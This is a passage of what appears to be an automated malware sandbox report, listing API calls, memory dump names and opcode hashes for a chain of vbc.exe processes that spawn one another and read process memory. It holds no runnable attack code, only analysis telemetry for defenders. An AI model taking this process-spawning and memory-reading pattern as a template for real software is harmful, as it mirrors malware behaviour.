VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02741739
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0274179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 02741808, 0274180B

Memory Dump Source

Source File: 0000000E.00000002.2231416186.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: 341d77f6bbd0c1c7f94fd19cd12bb1578dd58e3218962fe64a5bae5523152b0e
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: A6E15A21E54388EEEF21DBE4DC15BEDBBB5AF04B10F50409AE648FA1D1D7B10A84DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0274091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02740A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02740BED

Memory Dump Source

Source File: 0000000E.00000002.2231416186.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: f256c6719d2bd5fc13f360b4c89982c299eb5ffa0cad11feec14bc9ff737db99
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 20A1E331E00209EFDF15DFE4C989BADBBB1BF08315F20845AE615BA2A0DB755A90DF14

Uniqueness

Uniqueness Score: -1.00%

Function 02740034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0274058C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027405D3
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 027408ED

Memory Dump Source

Source File: 0000000E.00000002.2231416186.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: 586f5652b4bc527dd74aa0c7a081951e1dbe09029706f17ed2024eca88b7ff7c
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: 48523A35E50258EEEB64CBA4EC55BFDB7B5AF48700F20449AE618FA2A0D7705E80DF05

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 1840 Parent PID: 2272 vbc.exeCOMMON

Executed Functions

Function 005D13F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 005D1739
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005D179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 005D1808, 005D180B

Memory Dump Source

Source File: 00000010.00000002.2243292101.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: 571cc0b9927fef25adf8f2f22fd61e8a6537e9accac99f28de6a37710b63dc27
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: B6E14A21D44388EDEB21CBE4DC16BEDBBB5AF04710F10449BE648FA2D1D7B10A84DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 005D091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 005D0A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 005D0BED

Memory Dump Source

Source File: 00000010.00000002.2243292101.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: b54e346e434d4255f6d24acfeb68b79a7cb2182b5b3d01ff65ac142f769507e3
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: B6A1F130D04209EFEF20CFE8C999BADBBB1BF08315F20945BE515BA2A0D7755A80DB14

Uniqueness

Uniqueness Score: -1.00%

Function 005D0034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 005D058C
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 005D05D3
TerminateProcess.KERNEL32(00000000,00000000,?), ref: 005D08ED

Memory Dump Source

Source File: 00000010.00000002.2243292101.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: 188dbf03a6e4cc5a4b61254165a7b887946ad7c18a5239b6c2a0653f4130f69e
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: 8E521935A50258AEEB60CB98EC55BFDBBB5BF48700F205497E608FA2E0D3705E80DB55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 1192 Parent PID: 1840 vbc.exeCOMMON

Executed Functions

Function 005313F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00531739
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0053179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 00531808, 0053180B

Memory Dump Source

Source File: 00000012.00000002.2258051711.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: 34cb6c0dd284b37cb4f1fc53ce4e5733327506f75ee58b395a78dd07740ddd47
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: 0AE15921D54388EDEF21CBE4DC16BEDBBB5AF04B10F10449AE648FA1D1D7B10A84DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 0053091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00530A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00530BED

Memory Dump Source

Source File: 00000012.00000002.2258051711.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 4b3e42ac7be2bfad01474fae53fbe0260b5478fd9471723589ae76daa011b707
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: F1A1FF31D00209EFDF10CFE4D9A9BADFBB1BF08315F20949AE515BA2A0D7759A90DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00530034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0053058C
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 005305D3
TerminateProcess.KERNEL32(00000000,00000000,?), ref: 005308ED

Memory Dump Source

Source File: 00000012.00000002.2258051711.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: ceeca9852cc7c4bf4e9befc252ddfaab42d06958561436e4ba97ccc913c24539
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: CA520A35A50358AEEB60CBA4EC65BFDB7B5BF48710F205496E608FA2E0D3705E80DB45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2320 Parent PID: 1192 vbc.exeCOMMON

Executed Functions

Function 01F013F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 01F01739
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01F0179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 01F01808, 01F0180B

Memory Dump Source

Source File: 00000014.00000002.2272642125.0000000001F00000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: f1624191e706db090a827b0e8a9e01ab474678211b30401e5b19460bbe32b481
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: B3E13921D54398EDEF22CBE4DC15BADBBB5AF04710F10409AE648FA1D1D7B60B84EB16

Uniqueness

Uniqueness Score: -1.00%

Function 01F0091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 01F00A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 01F00BED

Memory Dump Source

Source File: 00000014.00000002.2272642125.0000000001F00000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 3aa21181357bec73888d8119eac722ddd2dd1edebf6345cd1e13eca9a1fb82bf
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 77A11271D04209EFDF12CFE4C985BADBBB1BF08315F248556E615BA2E1C7769A80EB10

Uniqueness

Uniqueness Score: -1.00%

Function 01F00034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 01F0058C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F005D3
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 01F008ED

Memory Dump Source

Source File: 00000014.00000002.2272642125.0000000001F00000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: a5794989a2d6d102f833e7dcfb1e692e285d864809b5cc7d8936d7993d06b28e
Instruction ID: 3c869d1d86c4ba66f08ffd2ff5e550391a41bd3cde2362af9265ba797902c007
Opcode Fuzzy Hash: a5794989a2d6d102f833e7dcfb1e692e285d864809b5cc7d8936d7993d06b28e
Instruction Fuzzy Hash: 62521935E50258EEEB61CB98EC55BFDB7B5BF48700F204496E608FA2E0D7715A80EB05

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 1888 Parent PID: 2320 vbc.exeCOMMON

Executed Functions

Function 01F413F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 01F41739
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01F4179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 01F41808, 01F4180B

Memory Dump Source

Source File: 00000016.00000002.2286963379.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: 0ad3a092ad889aa3106f4dc7e7edf17060a7810acdcea80f23dcd2a16af45d79
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: 0CE16A21D44388EEEF21CBE4DC15BEDBBB5AF04B00F10409AE648FA1D1D7B21A84DB16

Uniqueness

Uniqueness Score: -1.00%

Function 01F4091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 01F40A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 01F40BED

Memory Dump Source

Source File: 00000016.00000002.2286963379.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 78689d112465040be878670d0fe71b77cd3b09d0ad1c9b25a596015f439b687c
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 48A11035D04209EFEF10CFE8C985BEDBBB1AF08315F24855AE611BA2A1D7725A80DB14

Uniqueness

Uniqueness Score: -1.00%

Function 01F40034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 01F4058C
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 01F405D3
TerminateProcess.KERNEL32(00000000,00000000,?), ref: 01F408ED

Memory Dump Source

Source File: 00000016.00000002.2286963379.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: a5794989a2d6d102f833e7dcfb1e692e285d864809b5cc7d8936d7993d06b28e
Instruction ID: 7f2d8ed1ca943bb89d7f6b86a58e8b0bbee9829fe016f0f7a4f044a23efefae8
Opcode Fuzzy Hash: a5794989a2d6d102f833e7dcfb1e692e285d864809b5cc7d8936d7993d06b28e
Instruction Fuzzy Hash: 46523C35E50258EEEB60CB98EC55BFDBBB4AF48700F204496E608FA2A0D7715E80DF45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2252 Parent PID: 1888 vbc.exeCOMMON

Executed Functions

Function 005413F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00541739
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0054179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 00541808, 0054180B

Memory Dump Source

Source File: 00000018.00000002.2301735990.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: aa06f10c2a10309ddcbebade73dc7ded0be3b54c9cc812a30f858f7f1a060dc0
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: F9E15931D54388EDEB21CBE4DC16BEDBBB5AF04B14F10409AE648FA1D1D7B10A84DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 0054091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00540A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00540BED

Memory Dump Source

Source File: 00000018.00000002.2301735990.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 027e357dff96360033f742fbecb2a56eabbd2a8cbf34e6c465b0123cd12129c9
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 6AA1CF31D00209EFDF10DFA4C989BEDBBB1FF08319F20945AE615BA2A1D7755A90DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00540034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0054058C
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 005405D3
TerminateProcess.KERNEL32(00000000,00000000,?), ref: 005408ED

Memory Dump Source

Source File: 00000018.00000002.2301735990.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: 2b1c44f07ff9f1918ffe4002e61d214bf3fc7655aea085a01ed73ebad647e07f
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: E6521835A50258AEEB60CBA4EC55BFDBBB5BF48704F205496E608FA2E0D3705E80DF45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2644 Parent PID: 2252 vbc.exeCOMMON

Executed Functions

Function 027413F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02741739
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0274179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 02741808, 0274180B

Memory Dump Source

Source File: 0000001A.00000002.2315955555.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: 341d77f6bbd0c1c7f94fd19cd12bb1578dd58e3218962fe64a5bae5523152b0e
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: A6E15A21E54388EEEF21DBE4DC15BEDBBB5AF04B10F50409AE648FA1D1D7B10A84DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0274091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02740A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02740BED

Memory Dump Source

Source File: 0000001A.00000002.2315955555.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: f256c6719d2bd5fc13f360b4c89982c299eb5ffa0cad11feec14bc9ff737db99
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 20A1E331E00209EFDF15DFE4C989BADBBB1BF08315F20845AE615BA2A0DB755A90DF14

Uniqueness

Uniqueness Score: -1.00%

Function 02740034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0274058C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027405D3
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 027408ED

Memory Dump Source

Source File: 0000001A.00000002.2315955555.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: 586f5652b4bc527dd74aa0c7a081951e1dbe09029706f17ed2024eca88b7ff7c
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: 48523A35E50258EEEB64CBA4EC55BFDB7B5AF48700F20449AE618FA2A0D7705E80DF05

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2688 Parent PID: 2644 vbc.exeCOMMON

Executed Functions

Function 004313F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00431739
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0043179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 00431808, 0043180B

Memory Dump Source

Source File: 0000001C.00000002.2329417076.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: 2fb7317618ca62271da53b771e16b1af27a675a5e0a7b0044d91730c422f3827
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: 33E16F20D44388EDEF21DBE4DC16BEDBBB5AF08714F10509AE648FA1E1D7B50A84DB19

Uniqueness

Uniqueness Score: -1.00%

Function 0043091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00430A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00430BED

Memory Dump Source

Source File: 0000001C.00000002.2329417076.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 7c7dafa2befd4de379dd934a6a8f9eb1dd0293695ed858227d0316826f94d13b
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: E4A10170D00209EFDF10DFE4D895BADFBB1AF08315F20955AE515BA2A0D3789A41DF19

Uniqueness

Uniqueness Score: -1.00%

Function 00430034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0043058C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004305D3
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 004308ED

Memory Dump Source

Source File: 0000001C.00000002.2329417076.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: badc0c7138c6de790abd3abee7eb1e5aeeb9a9fca14e621c565508c0a416f454
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: E9523C35E50258EEEB64CB94EC55BFDB7B4AF48700F20559AE608FA2A0D3745E80DF09

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2404 Parent PID: 2688 vbc.exeCOMMON

Executed Functions

Function 027413F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02741739
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0274179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 02741808, 0274180B

Memory Dump Source

Source File: 0000001E.00000002.2346425073.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: 341d77f6bbd0c1c7f94fd19cd12bb1578dd58e3218962fe64a5bae5523152b0e
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: A6E15A21E54388EEEF21DBE4DC15BEDBBB5AF04B10F50409AE648FA1D1D7B10A84DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0274091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02740A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02740BED

Memory Dump Source

Source File: 0000001E.00000002.2346425073.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: f256c6719d2bd5fc13f360b4c89982c299eb5ffa0cad11feec14bc9ff737db99
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 20A1E331E00209EFDF15DFE4C989BADBBB1BF08315F20845AE615BA2A0DB755A90DF14

Uniqueness

Uniqueness Score: -1.00%

Function 02740034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0274058C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027405D3
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 027408ED

Memory Dump Source

Source File: 0000001E.00000002.2346425073.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
